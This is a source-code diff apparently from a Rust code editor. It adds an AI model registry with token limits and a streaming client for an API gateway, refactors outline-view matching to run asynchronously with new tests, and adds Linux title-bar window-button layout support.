+ Self::Gpt5_1CodexMax => "gpt-5.1-codex-max",
+ Self::Gpt5_1CodexMini => "gpt-5.1-codex-mini",
+ Self::Gpt5 => "gpt-5",
+ Self::Gpt5Codex => "gpt-5-codex",
+ Self::Gpt5Nano => "gpt-5-nano",
+
+ Self::Gemini3_1Pro => "gemini-3.1-pro",
+ Self::Gemini3Flash => "gemini-3-flash",
+
+ Self::MiniMaxM2_5 => "minimax-m2.5",
+ Self::MiniMaxM2_5Free => "minimax-m2.5-free",
+ Self::Glm5 => "glm-5",
+ Self::KimiK2_5 => "kimi-k2.5",
+ Self::MimoV2ProFree => "mimo-v2-pro-free",
+ Self::MimoV2OmniFree => "mimo-v2-omni-free",
+ Self::MimoV2FlashFree => "mimo-v2-flash-free",
+ Self::TrinityLargePreviewFree => "trinity-large-preview-free",
+ Self::BigPickle => "big-pickle",
+ Self::Nemotron3SuperFree => "nemotron-3-super-free",
+
+ Self::Custom { name, .. } => name,
+ }
+ }
+
+ pub fn display_name(&self) -> &str {
+ match self {
+ Self::ClaudeOpus4_6 => "Claude Opus 4.6",
+ Self::ClaudeOpus4_5 => "Claude Opus 4.5",
+ Self::ClaudeOpus4_1 => "Claude Opus 4.1",
+ Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6",
+ Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5",
+ Self::ClaudeSonnet4 => "Claude Sonnet 4",
+ Self::ClaudeHaiku4_5 => "Claude Haiku 4.5",
+ Self::Claude3_5Haiku => "Claude Haiku 3.5",
+
+ Self::Gpt5_4 => "GPT 5.4",
+ Self::Gpt5_4Pro => "GPT 5.4 Pro",
+ Self::Gpt5_4Mini => "GPT 5.4 Mini",
+ Self::Gpt5_4Nano => "GPT 5.4 Nano",
+ Self::Gpt5_3Codex => "GPT 5.3 Codex",
+ Self::Gpt5_3Spark => "GPT 5.3 Codex Spark",
+ Self::Gpt5_2 => "GPT 5.2",
+ Self::Gpt5_2Codex => "GPT 5.2 Codex",
+ Self::Gpt5_1 => "GPT 5.1",
+ Self::Gpt5_1Codex => "GPT 5.1 Codex",
+ Self::Gpt5_1CodexMax => "GPT 5.1 Codex Max",
+ Self::Gpt5_1CodexMini => "GPT 5.1 Codex Mini",
+ Self::Gpt5 => "GPT 5",
+ Self::Gpt5Codex => "GPT 5 Codex",
+ Self::Gpt5Nano => "GPT 5 Nano",
+
+ Self::Gemini3_1Pro => "Gemini 3.1 Pro",
+ Self::Gemini3Flash => "Gemini 3 Flash",
+
+ Self::MiniMaxM2_5 => "MiniMax M2.5",
+ Self::MiniMaxM2_5Free => "MiniMax M2.5 Free",
+ Self::Glm5 => "GLM 5",
+ Self::KimiK2_5 => "Kimi K2.5",
+ Self::MimoV2ProFree => "MiMo V2 Pro Free",
+ Self::MimoV2OmniFree => "MiMo V2 Omni Free",
+ Self::MimoV2FlashFree => "MiMo V2 Flash Free",
+ Self::TrinityLargePreviewFree => "Trinity Large Preview Free",
+ Self::BigPickle => "Big Pickle",
+ Self::Nemotron3SuperFree => "Nemotron 3 Super Free",
+
+ Self::Custom {
+ name, display_name, ..
+ } => display_name.as_deref().unwrap_or(name),
+ }
+ }
+
+ pub fn protocol(&self) -> ApiProtocol {
+ match self {
+ Self::ClaudeOpus4_6
+ | Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeSonnet4_6
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeSonnet4
+ | Self::ClaudeHaiku4_5
+ | Self::Claude3_5Haiku => ApiProtocol::Anthropic,
+
+ Self::Gpt5_4
+ | Self::Gpt5_4Pro
+ | Self::Gpt5_4Mini
+ | Self::Gpt5_4Nano
+ | Self::Gpt5_3Codex
+ | Self::Gpt5_3Spark
+ | Self::Gpt5_2
+ | Self::Gpt5_2Codex
+ | Self::Gpt5_1
+ | Self::Gpt5_1Codex
+ | Self::Gpt5_1CodexMax
+ | Self::Gpt5_1CodexMini
+ | Self::Gpt5
+ | Self::Gpt5Codex
+ | Self::Gpt5Nano => ApiProtocol::OpenAiResponses,
+
+ Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google,
+
+ Self::MiniMaxM2_5
+ | Self::MiniMaxM2_5Free
+ | Self::Glm5
+ | Self::KimiK2_5
+ | Self::MimoV2ProFree
+ | Self::MimoV2OmniFree
+ | Self::MimoV2FlashFree
+ | Self::TrinityLargePreviewFree
+ | Self::BigPickle
+ | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat,
+
+ Self::Custom { protocol, .. } => *protocol,
+ }
+ }
+
+ pub fn max_token_count(&self) -> u64 {
+ match self {
+ // Anthropic models
+ Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000,
+ Self::ClaudeOpus4_5 | Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4 => 200_000,
+ Self::ClaudeOpus4_1 => 200_000,
+ Self::ClaudeHaiku4_5 => 200_000,
+ Self::Claude3_5Haiku => 200_000,
+
+ // OpenAI models
+ Self::Gpt5_4 | Self::Gpt5_4Pro => 1_050_000,
+ Self::Gpt5_4Mini | Self::Gpt5_4Nano => 400_000,
+ Self::Gpt5_3Codex => 400_000,
+ Self::Gpt5_3Spark => 128_000,
+ Self::Gpt5_2 | Self::Gpt5_2Codex => 400_000,
+ Self::Gpt5_1 | Self::Gpt5_1Codex | Self::Gpt5_1CodexMax | Self::Gpt5_1CodexMini => {
+ 400_000
+ }
+ Self::Gpt5 | Self::Gpt5Codex | Self::Gpt5Nano => 400_000,
+
+ // Google models
+ Self::Gemini3_1Pro => 1_048_576,
+ Self::Gemini3Flash => 1_048_576,
+
+ // OpenAI-compatible models
+ Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 196_608,
+ Self::Glm5 => 200_000,
+ Self::KimiK2_5 => 262_144,
+ Self::MimoV2ProFree => 1_048_576,
+ Self::MimoV2OmniFree | Self::MimoV2FlashFree => 262_144,
+ Self::TrinityLargePreviewFree => 131_072,
+ Self::BigPickle => 200_000,
+ Self::Nemotron3SuperFree => 262_144,
+
+ Self::Custom { max_tokens, .. } => *max_tokens,
+ }
+ }
+
+ pub fn max_output_tokens(&self) -> Option<u64> {
+ match self {
+ // Anthropic models
+ Self::ClaudeOpus4_6 => Some(128_000),
+ Self::ClaudeSonnet4_6 => Some(64_000),
+ Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeSonnet4
+ | Self::ClaudeHaiku4_5 => Some(64_000),
+ Self::Claude3_5Haiku => Some(8_192),
+
+ // OpenAI models
+ Self::Gpt5_4
+ | Self::Gpt5_4Pro
+ | Self::Gpt5_4Mini
+ | Self::Gpt5_4Nano
+ | Self::Gpt5_3Codex
+ | Self::Gpt5_3Spark
+ | Self::Gpt5_2
+ | Self::Gpt5_2Codex
+ | Self::Gpt5_1
+ | Self::Gpt5_1Codex
+ | Self::Gpt5_1CodexMax
+ | Self::Gpt5_1CodexMini
+ | Self::Gpt5
+ | Self::Gpt5Codex
+ | Self::Gpt5Nano => Some(128_000),
+
+ // Google models
+ Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536),
+
+ // OpenAI-compatible models
+ Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(65_536),
+ Self::Glm5 | Self::BigPickle => Some(128_000),
+ Self::KimiK2_5 => Some(65_536),
+ Self::MimoV2ProFree => Some(131_072),
+ Self::MimoV2OmniFree | Self::MimoV2FlashFree => Some(65_536),
+ Self::TrinityLargePreviewFree | Self::Nemotron3SuperFree => Some(16_384),
+
+ Self::Custom {
+ max_output_tokens, ..
+ } => *max_output_tokens,
+ }
+ }
+
    /// Whether the model supports tool (function) calling.
    ///
    /// Unconditionally `true`: every built-in model in this registry supports
    /// tools, and custom models are assumed to as well.
    pub fn supports_tools(&self) -> bool {
        true
    }
+
    /// Whether the model accepts image input parts in requests.
    pub fn supports_images(&self) -> bool {
        match self {
            // Anthropic models support images
            Self::ClaudeOpus4_6
            | Self::ClaudeOpus4_5
            | Self::ClaudeOpus4_1
            | Self::ClaudeSonnet4_6
            | Self::ClaudeSonnet4_5
            | Self::ClaudeSonnet4
            | Self::ClaudeHaiku4_5
            | Self::Claude3_5Haiku => true,

            // OpenAI models support images
            Self::Gpt5_4
            | Self::Gpt5_4Pro
            | Self::Gpt5_4Mini
            | Self::Gpt5_4Nano
            | Self::Gpt5_3Codex
            | Self::Gpt5_3Spark
            | Self::Gpt5_2
            | Self::Gpt5_2Codex
            | Self::Gpt5_1
            | Self::Gpt5_1Codex
            | Self::Gpt5_1CodexMax
            | Self::Gpt5_1CodexMini
            | Self::Gpt5
            | Self::Gpt5Codex
            | Self::Gpt5Nano => true,

            // Google models support images
            Self::Gemini3_1Pro | Self::Gemini3Flash => true,

            // OpenAI-compatible models — conservative default
            Self::MiniMaxM2_5
            | Self::MiniMaxM2_5Free
            | Self::Glm5
            | Self::KimiK2_5
            | Self::MimoV2ProFree
            | Self::MimoV2OmniFree
            | Self::MimoV2FlashFree
            | Self::TrinityLargePreviewFree
            | Self::BigPickle
            | Self::Nemotron3SuperFree => false,

            // NOTE(review): this `matches!` lists every `ApiProtocol` variant
            // visible in this file, so custom models currently always report
            // image support — confirm whether that is intended or whether
            // some protocols should be excluded here.
            Self::Custom { protocol, .. } => matches!(
                protocol,
                ApiProtocol::Anthropic
                    | ApiProtocol::OpenAiResponses
                    | ApiProtocol::OpenAiChat
                    | ApiProtocol::Google
            ),
        }
    }
+}
+
+/// Stream generate content for Google models via OpenCode Zen.
+///
+/// Unlike `google_ai::stream_generate_content()`, this uses:
+/// - `/v1/models/{model}` path (not `/v1beta/models/{model}`)
+/// - `Authorization: Bearer` header (not `key=` query param)
+pub async fn stream_generate_content_zen(
+ client: &dyn HttpClient,
+ api_url: &str,
+ api_key: &str,
+ request: google_ai::GenerateContentRequest,
+) -> Result<BoxStream<'static, Result<google_ai::GenerateContentResponse>>> {
+ let api_key = api_key.trim();
+
+ let model_id = &request.model.model_id;
+
+ let uri = format!("{api_url}/v1/models/{model_id}:streamGenerateContent?alt=sse");
+
+ let request_builder = HttpRequest::builder()
+ .method(Method::POST)
+ .uri(uri)
+ .header("Content-Type", "application/json")
+ .header("Authorization", format!("Bearer {api_key}"));
+
+ let request = request_builder.body(AsyncBody::from(serde_json::to_string(&request)?))?;
+ let mut response = client.send(request).await?;
+ if response.status().is_success() {
+ let reader = BufReader::new(response.into_body());
+ Ok(reader
+ .lines()
+ .filter_map(|line| async move {
+ match line {
+ Ok(line) => {
+ if let Some(line) = line.strip_prefix("data: ") {
+ match serde_json::from_str(line) {
+ Ok(response) => Some(Ok(response)),
+ Err(error) => {
+ Some(Err(anyhow!("Error parsing JSON: {error:?}\n{line:?}")))
+ }
+ }
+ } else {
+ None
+ }
+ }
+ Err(error) => Some(Err(anyhow!(error))),
+ }
+ })
+ .boxed())
+ } else {
+ let mut text = String::new();
+ response.body_mut().read_to_string(&mut text).await?;
+ Err(anyhow!(
+ "error during streamGenerateContent via OpenCode Zen, status code: {:?}, body: {}",
+ response.status(),
+ text
+ ))
+ }
+}
@@ -1,8 +1,5 @@
use std::ops::Range;
-use std::{
- cmp::{self, Reverse},
- sync::Arc,
-};
+use std::{cmp, sync::Arc};
use editor::scroll::ScrollOffset;
use editor::{Anchor, AnchorRangeExt, Editor, scroll::Autoscroll};
@@ -183,11 +180,10 @@ impl OutlineView {
struct OutlineViewDelegate {
outline_view: WeakEntity<OutlineView>,
active_editor: Entity<Editor>,
- outline: Outline<Anchor>,
+ outline: Arc<Outline<Anchor>>,
selected_match_index: usize,
prev_scroll_position: Option<Point<ScrollOffset>>,
matches: Vec<StringMatch>,
- last_query: String,
}
enum OutlineRowHighlights {}
@@ -202,12 +198,11 @@ impl OutlineViewDelegate {
) -> Self {
Self {
outline_view,
- last_query: Default::default(),
matches: Default::default(),
selected_match_index: 0,
prev_scroll_position: Some(editor.update(cx, |editor, cx| editor.scroll_position(cx))),
active_editor: editor,
- outline,
+ outline: Arc::new(outline),
}
}
@@ -280,67 +275,73 @@ impl PickerDelegate for OutlineViewDelegate {
window: &mut Window,
cx: &mut Context<Picker<OutlineViewDelegate>>,
) -> Task<()> {
- let selected_index;
- if query.is_empty() {
+ let is_query_empty = query.is_empty();
+ if is_query_empty {
self.restore_active_editor(window, cx);
- self.matches = self
- .outline
- .items
- .iter()
- .enumerate()
- .map(|(index, _)| StringMatch {
- candidate_id: index,
- score: Default::default(),
- positions: Default::default(),
- string: Default::default(),
- })
- .collect();
-
- let (buffer, cursor_offset) = self.active_editor.update(cx, |editor, cx| {
- let buffer = editor.buffer().read(cx).snapshot(cx);
- let cursor_offset = editor
- .selections
- .newest::<MultiBufferOffset>(&editor.display_snapshot(cx))
- .head();
- (buffer, cursor_offset)
- });
- selected_index = self
- .outline
- .items
- .iter()
- .enumerate()
- .map(|(ix, item)| {
- let range = item.range.to_offset(&buffer);
- let distance_to_closest_endpoint = cmp::min(
- (range.start.0 as isize - cursor_offset.0 as isize).abs(),
- (range.end.0 as isize - cursor_offset.0 as isize).abs(),
- );
- let depth = if range.contains(&cursor_offset) {
- Some(item.depth)
- } else {
- None
- };
- (ix, depth, distance_to_closest_endpoint)
- })
- .max_by_key(|(_, depth, distance)| (*depth, Reverse(*distance)))
- .map(|(ix, _, _)| ix)
- .unwrap_or(0);
- } else {
- self.matches = smol::block_on(
- self.outline
- .search(&query, cx.background_executor().clone()),
- );
- selected_index = self
- .matches
- .iter()
- .enumerate()
- .max_by_key(|(_, m)| OrderedFloat(m.score))
- .map(|(ix, _)| ix)
- .unwrap_or(0);
}
- self.last_query = query;
- self.set_selected_index(selected_index, !self.last_query.is_empty(), cx);
- Task::ready(())
+
+ let outline = self.outline.clone();
+ cx.spawn_in(window, async move |this, cx| {
+ let matches = if is_query_empty {
+ outline
+ .items
+ .iter()
+ .enumerate()
+ .map(|(index, _)| StringMatch {
+ candidate_id: index,
+ score: Default::default(),
+ positions: Default::default(),
+ string: Default::default(),
+ })
+ .collect()
+ } else {
+ outline
+ .search(&query, cx.background_executor().clone())
+ .await
+ };
+
+ let _ = this.update(cx, |this, cx| {
+ this.delegate.matches = matches;
+ let selected_index = if is_query_empty {
+ let (buffer, cursor_offset) =
+ this.delegate.active_editor.update(cx, |editor, cx| {
+ let snapshot = editor.display_snapshot(cx);
+ let cursor_offset = editor
+ .selections
+ .newest::<MultiBufferOffset>(&snapshot)
+ .head();
+ (snapshot.buffer().clone(), cursor_offset)
+ });
+ this.delegate
+ .matches
+ .iter()
+ .enumerate()
+ .filter_map(|(ix, m)| {
+ let item = &this.delegate.outline.items[m.candidate_id];
+ let range = item.range.to_offset(&buffer);
+ range.contains(&cursor_offset).then_some((ix, item.depth))
+ })
+ .max_by_key(|(ix, depth)| (*depth, cmp::Reverse(*ix)))
+ .map(|(ix, _)| ix)
+ .unwrap_or(0)
+ } else {
+ this.delegate
+ .matches
+ .iter()
+ .enumerate()
+ .max_by(|(ix_a, a), (ix_b, b)| {
+ OrderedFloat(a.score)
+ .cmp(&OrderedFloat(b.score))
+ .then(ix_b.cmp(ix_a))
+ })
+ .map(|(ix, _)| ix)
+ .unwrap_or(0)
+ };
+
+ this.delegate
+ .set_selected_index(selected_index, !is_query_empty, cx);
+ });
+ })
}
fn confirm(
@@ -586,6 +587,246 @@ mod tests {
assert_single_caret_at_row(&editor, expected_first_highlighted_row, cx);
}
    /// Verifies empty-query outline selection: with no filter text, the
    /// picker should select the deepest symbol containing the cursor, and
    /// fall back to the first symbol when the cursor is outside every range.
    #[gpui::test]
    async fn test_outline_empty_query_prefers_deepest_containing_symbol_else_first(
        cx: &mut TestAppContext,
    ) {
        init_test(cx);

        // A buffer with nested symbols (`Outer` > `top`) plus a sibling
        // `Another` outside both.
        let fs = FakeFs::new(cx.executor());
        fs.insert_tree(
            path!("/dir"),
            json!({
                "a.rs": indoc! {"
                    // display line 0
                    struct Outer { // display line 1
                        fn top(&self) {// display line 2
                            let _x = 1;// display line 3
                        } // display line 4
                    } // display line 5

                    struct Another; // display line 7
                "}
            }),
        )
        .await;

        let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
        project.read_with(cx, |project, _| {
            project.languages().add(language::rust_lang())
        });

        let (workspace, cx) =
            cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));

        let workspace = cx.read(|cx| workspace.read(cx).workspace().clone());
        let worktree_id = workspace.update(cx, |workspace, cx| {
            workspace.project().update(cx, |project, cx| {
                project.worktrees(cx).next().unwrap().read(cx).id()
            })
        });
        let _buffer = project
            .update(cx, |project, cx| {
                project.open_local_buffer(path!("/dir/a.rs"), cx)
            })
            .await
            .unwrap();
        let editor = workspace
            .update_in(cx, |workspace, window, cx| {
                workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx)
            })
            .await
            .unwrap()
            .downcast::<Editor>()
            .unwrap();

        // Cursor inside `top` (the deepest symbol) — the outline should
        // select it.
        set_single_caret_at_row(&editor, 3, cx);
        let outline_view = open_outline_view(&workspace, cx);
        cx.run_until_parked();
        let (selected_candidate_id, expected_deepest_containing_candidate_id) = outline_view
            .update(cx, |outline_view, cx| {
                let delegate = &outline_view.delegate;
                let selected_candidate_id =
                    delegate.matches[delegate.selected_match_index].candidate_id;
                let (buffer, cursor_offset) = delegate.active_editor.update(cx, |editor, cx| {
                    let buffer = editor.buffer().read(cx).snapshot(cx);
                    let cursor_offset = editor
                        .selections
                        .newest::<MultiBufferOffset>(&editor.display_snapshot(cx))
                        .head();
                    (buffer, cursor_offset)
                });
                // Recompute the expected answer independently of the picker:
                // the deepest outline item whose range contains the cursor.
                let deepest_containing_candidate_id = delegate
                    .outline
                    .items
                    .iter()
                    .enumerate()
                    .filter_map(|(ix, item)| {
                        item.range
                            .to_offset(&buffer)
                            .contains(&cursor_offset)
                            .then_some((ix, item.depth))
                    })
                    .max_by(|(ix_a, depth_a), (ix_b, depth_b)| {
                        depth_a.cmp(depth_b).then(ix_b.cmp(ix_a))
                    })
                    .map(|(ix, _)| ix)
                    .unwrap();
                (selected_candidate_id, deepest_containing_candidate_id)
            });
        assert_eq!(
            selected_candidate_id, expected_deepest_containing_candidate_id,
            "Empty query should select the deepest symbol containing the cursor"
        );

        cx.dispatch_action(menu::Cancel);
        cx.run_until_parked();

        // Cursor on the comment line, outside every symbol range — the
        // picker should fall back to the first item.
        set_single_caret_at_row(&editor, 0, cx);
        let outline_view = open_outline_view(&workspace, cx);
        cx.run_until_parked();
        let selected_candidate_id = outline_view.read_with(cx, |outline_view, _| {
            let delegate = &outline_view.delegate;
            delegate.matches[delegate.selected_match_index].candidate_id
        });
        assert_eq!(
            selected_candidate_id, 0,
            "Empty query should fall back to the first symbol when cursor is outside all symbol ranges"
        );
    }
+
    /// Verifies filtered outline selection: when several matches score
    /// equally, the first scored match is selected, and cursor position does
    /// not influence the ranking.
    #[gpui::test]
    async fn test_outline_filtered_selection_prefers_first_match_on_score_ties(
        cx: &mut TestAppContext,
    ) {
        init_test(cx);

        // Three structurally identical impls so that querying `f` produces
        // several equally-scored matches.
        let fs = FakeFs::new(cx.executor());
        fs.insert_tree(
            path!("/dir"),
            json!({
                "a.rs": indoc! {"
                    struct A;
                    impl A {
                        fn f(&self) {}
                        fn g(&self) {}
                    }

                    struct B;
                    impl B {
                        fn f(&self) {}
                        fn g(&self) {}
                    }

                    struct C;
                    impl C {
                        fn f(&self) {}
                        fn g(&self) {}
                    }
                "}
            }),
        )
        .await;

        let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
        project.read_with(cx, |project, _| {
            project.languages().add(language::rust_lang())
        });

        let (workspace, cx) =
            cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));

        let workspace = cx.read(|cx| workspace.read(cx).workspace().clone());
        let worktree_id = workspace.update(cx, |workspace, cx| {
            workspace.project().update(cx, |project, cx| {
                project.worktrees(cx).next().unwrap().read(cx).id()
            })
        });
        let _buffer = project
            .update(cx, |project, cx| {
                project.open_local_buffer(path!("/dir/a.rs"), cx)
            })
            .await
            .unwrap();
        let editor = workspace
            .update_in(cx, |workspace, window, cx| {
                workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx)
            })
            .await
            .unwrap()
            .downcast::<Editor>()
            .unwrap();

        assert_single_caret_at_row(&editor, 0, cx);
        let outline_view = open_outline_view(&workspace, cx);
        // Helper returning (selected id, first scored id, last scored id,
        // scored-match count) from the picker's current match list.
        let match_ids = |outline_view: &Entity<Picker<OutlineViewDelegate>>,
                         cx: &mut VisualTestContext| {
            outline_view.read_with(cx, |outline_view, _| {
                let delegate = &outline_view.delegate;
                let selected_match = &delegate.matches[delegate.selected_match_index];
                let scored_ids = delegate
                    .matches
                    .iter()
                    .filter(|m| m.score > 0.0)
                    .map(|m| m.candidate_id)
                    .collect::<Vec<_>>();
                (
                    selected_match.candidate_id,
                    *scored_ids.first().unwrap(),
                    *scored_ids.last().unwrap(),
                    scored_ids.len(),
                )
            })
        };

        outline_view
            .update_in(cx, |outline_view, window, cx| {
                outline_view
                    .delegate
                    .update_matches("f".to_string(), window, cx)
            })
            .await;
        let (selected_id, first_scored_id, last_scored_id, scored_match_count) =
            match_ids(&outline_view, cx);

        assert!(
            scored_match_count > 1,
            "Expected multiple scored matches for `f` in outline filtering"
        );
        assert_eq!(
            selected_id, first_scored_id,
            "Filtered query should pick the first scored match when scores tie"
        );
        assert_ne!(
            selected_id, last_scored_id,
            "Selection should not default to the last scored match"
        );

        // Move the caret near a later `f`; the filtered selection must stay
        // score-ordered, not follow cursor proximity.
        set_single_caret_at_row(&editor, 12, cx);
        outline_view
            .update_in(cx, |outline_view, window, cx| {
                outline_view
                    .delegate
                    .update_matches("f".to_string(), window, cx)
            })
            .await;
        let (selected_id, first_scored_id, last_scored_id, scored_match_count) =
            match_ids(&outline_view, cx);

        assert!(
            scored_match_count > 1,
            "Expected multiple scored matches for `f` in outline filtering"
        );
        assert_eq!(
            selected_id, first_scored_id,
            "Filtered selection should stay score-ordered and not switch based on cursor proximity"
        );
        assert_ne!(
            selected_id, last_scored_id,
            "Selection should not default to the last scored match"
        );
    }
+
fn open_outline_view(
workspace: &Entity<Workspace>,
cx: &mut VisualTestContext,
@@ -634,6 +875,18 @@ mod tests {
})
}
+ fn set_single_caret_at_row(
+ editor: &Entity<Editor>,
+ buffer_row: u32,
+ cx: &mut VisualTestContext,
+ ) {
+ editor.update_in(cx, |editor, window, cx| {
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_ranges([rope::Point::new(buffer_row, 0)..rope::Point::new(buffer_row, 0)])
+ });
+ });
+ }
+
fn init_test(cx: &mut TestAppContext) -> Arc<AppState> {
cx.update(|cx| {
let state = AppState::test(cx);
@@ -2,7 +2,7 @@ mod outline_panel_settings;
use anyhow::Context as _;
use collections::{BTreeSet, HashMap, HashSet, hash_map};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{
AnchorRangeExt, Bias, DisplayPoint, Editor, EditorEvent, ExcerptId, ExcerptRange,
MultiBufferSnapshot, RangeToAnchorExt, SelectionEffects,
@@ -693,16 +693,18 @@ impl OutlinePanel {
.ok()
.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
- .await
- .context("loading outline panel")
- .log_err()
- .flatten()
- .map(|panel| serde_json::from_str::<SerializedOutlinePanel>(&panel))
- .transpose()
- .log_err()
- .flatten(),
+ Some(serialization_key) => {
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ cx.background_spawn(async move { kvp.read_kvp(&serialization_key) })
+ .await
+ .context("loading outline panel")
+ .log_err()
+ .flatten()
+ .map(|panel| serde_json::from_str::<SerializedOutlinePanel>(&panel))
+ .transpose()
+ .log_err()
+ .flatten()
+ }
None => None,
};
@@ -958,14 +960,14 @@ impl OutlinePanel {
};
let width = self.width;
let active = Some(self.active);
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedOutlinePanel { width, active })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedOutlinePanel { width, active })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1488,13 +1490,7 @@ impl OutlinePanel {
let context_menu = ContextMenu::build(window, cx, |menu, _, _| {
menu.context(self.focus_handle.clone())
.action(
- if cfg!(target_os = "macos") {
- "Reveal in Finder"
- } else if cfg!(target_os = "windows") {
- "Reveal in File Explorer"
- } else {
- "Reveal in File Manager"
- },
+ ui::utils::reveal_in_file_manager_label(false),
Box::new(RevealInFileManager),
)
.action("Open in Terminal", Box::new(OpenInTerminal))
@@ -5073,7 +5069,7 @@ impl Panel for OutlinePanel {
}
fn activation_priority(&self) -> u32 {
- 5
+ 6
}
}
@@ -52,7 +52,6 @@ pub fn panel_button(label: impl Into<SharedString>) -> ui::Button {
let id = ElementId::Name(label.to_lowercase().replace(' ', "_").into());
ui::Button::new(id, label)
.label_size(ui::LabelSize::Small)
- .icon_size(ui::IconSize::Small)
// TODO: Change this once we use on_surface_bg in button_like
.layer(ui::ElevationIndex::ModalSurface)
.size(ui::ButtonSize::Compact)
@@ -788,6 +788,12 @@ impl<D: PickerDelegate> Picker<D> {
this.handle_click(ix, event.modifiers.platform, window, cx)
}),
)
+ .on_hover(cx.listener(move |this, hovered: &bool, window, cx| {
+ if *hovered {
+ this.set_selected_index(ix, None, false, window, cx);
+ cx.notify();
+ }
+ }))
.children(self.delegate.render_match(
ix,
ix == self.delegate.selected_index(),
@@ -3,9 +3,9 @@ mod system_window_tabs;
use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt};
use gpui::{
- AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement,
- MouseButton, ParentElement, StatefulInteractiveElement, Styled, Window, WindowControlArea, div,
- px,
+ Action, AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement,
+ MouseButton, ParentElement, StatefulInteractiveElement, Styled, Window, WindowButtonLayout,
+ WindowControlArea, div, px,
};
use project::DisableAiSettings;
use settings::Settings;
@@ -31,8 +31,8 @@ pub struct PlatformTitleBar {
children: SmallVec<[AnyElement; 2]>,
should_move: bool,
system_window_tabs: Entity<SystemWindowTabs>,
+ button_layout: Option<WindowButtonLayout>,
workspace_sidebar_open: bool,
- sidebar_has_notifications: bool,
}
impl PlatformTitleBar {
@@ -46,8 +46,8 @@ impl PlatformTitleBar {
children: SmallVec::new(),
should_move: false,
system_window_tabs,
+ button_layout: None,
workspace_sidebar_open: false,
- sidebar_has_notifications: false,
}
}
@@ -70,6 +70,24 @@ impl PlatformTitleBar {
self.children = children.into_iter().collect();
}
+ pub fn set_button_layout(&mut self, button_layout: Option<WindowButtonLayout>) {
+ self.button_layout = button_layout;
+ }
+
+ fn effective_button_layout(
+ &self,
+ decorations: &Decorations,
+ cx: &App,
+ ) -> Option<WindowButtonLayout> {
+ if self.platform_style == PlatformStyle::Linux
+ && matches!(decorations, Decorations::Client { .. })
+ {
+ self.button_layout.or_else(|| cx.button_layout())
+ } else {
+ None
+ }
+ }
+
pub fn init(cx: &mut App) {
SystemWindowTabs::init(cx);
}
@@ -83,19 +101,6 @@ impl PlatformTitleBar {
cx.notify();
}
- pub fn sidebar_has_notifications(&self) -> bool {
- self.sidebar_has_notifications
- }
-
- pub fn set_sidebar_has_notifications(
- &mut self,
- has_notifications: bool,
- cx: &mut Context<Self>,
- ) {
- self.sidebar_has_notifications = has_notifications;
- cx.notify();
- }
-
pub fn is_multi_workspace_enabled(cx: &App) -> bool {
cx.has_flag::<AgentV2FeatureFlag>() && !DisableAiSettings::get_global(cx).disable_ai
}
@@ -110,6 +115,7 @@ impl Render for PlatformTitleBar {
let close_action = Box::new(workspace::CloseWindow);
let children = mem::take(&mut self.children);
+ let button_layout = self.effective_button_layout(&decorations, cx);
let is_multiworkspace_sidebar_open =
PlatformTitleBar::is_multi_workspace_enabled(cx) && self.is_workspace_sidebar_open();
@@ -165,6 +171,14 @@ impl Render for PlatformTitleBar {
&& !is_multiworkspace_sidebar_open
{
this.pl(px(TRAFFIC_LIGHT_PADDING))
+ } else if let Some(button_layout) =
+ button_layout.filter(|button_layout| button_layout.left[0].is_some())
+ {
+ this.child(platform_linux::LinuxWindowControls::new(
+ "left-window-controls",
+ button_layout.left,
+ close_action.as_ref().boxed_clone(),
+ ))
} else {
this.pl_2()
}
@@ -203,14 +217,22 @@ impl Render for PlatformTitleBar {
PlatformStyle::Mac => title_bar,
PlatformStyle::Linux => {
if matches!(decorations, Decorations::Client { .. }) {
- title_bar
- .child(platform_linux::LinuxWindowControls::new(close_action))
- .when(supported_controls.window_menu, |titlebar| {
- titlebar
- .on_mouse_down(MouseButton::Right, move |ev, window, _| {
- window.show_window_menu(ev.position)
- })
+ let mut result = title_bar;
+ if let Some(button_layout) = button_layout
+ .filter(|button_layout| button_layout.right[0].is_some())
+ {
+ result = result.child(platform_linux::LinuxWindowControls::new(
+ "right-window-controls",
+ button_layout.right,
+ close_action.as_ref().boxed_clone(),
+ ));
+ }
+
+ result.when(supported_controls.window_menu, |titlebar| {
+ titlebar.on_mouse_down(MouseButton::Right, move |ev, window, _| {
+ window.show_window_menu(ev.position)
})
+ })
} else {
title_bar
}
@@ -1,46 +1,83 @@
-use gpui::{Action, Hsla, MouseButton, prelude::*, svg};
+use gpui::{
+ Action, AnyElement, Hsla, MAX_BUTTONS_PER_SIDE, MouseButton, WindowButton, prelude::*, svg,
+};
